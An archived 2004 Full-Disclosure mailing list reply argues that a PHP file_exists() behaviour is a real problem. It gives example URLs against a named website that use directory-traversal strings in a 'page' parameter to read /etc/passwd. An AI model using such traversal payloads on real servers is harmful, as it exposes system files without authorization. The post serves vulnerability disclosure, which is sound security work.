|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] RE: file_exists() bypassing , critical problem ?
From: Nourredine Himeur (lostnoobs
security-challenge.com)
Date: Mon Feb 02 2004 - 08:12:25 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
It depends of your php configuration... (but it's not a vulnerability so
..... i can say you what's the configuration is good ,because firstly nobody
listen me and secondly php-group are blind and deaf)
look this :
http://lists.netsys.com/pipermail/full-disclosure/2004-February/016612.html
http://www.opensavoir.com/test.txt
http://www.opensavoir.com/test.php
http://www.opensavoir.com/test.php?page=../../../../../../../../../../etc/pa
sswd
but it's not a vulnerability HA ! HA ! HA ! show this :
http://www.opensavoir.com/test.php?page=./anything/../../../../../../../../.
./../etc/passwd
:)
Nourredine Himeur
www.security-challenge.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]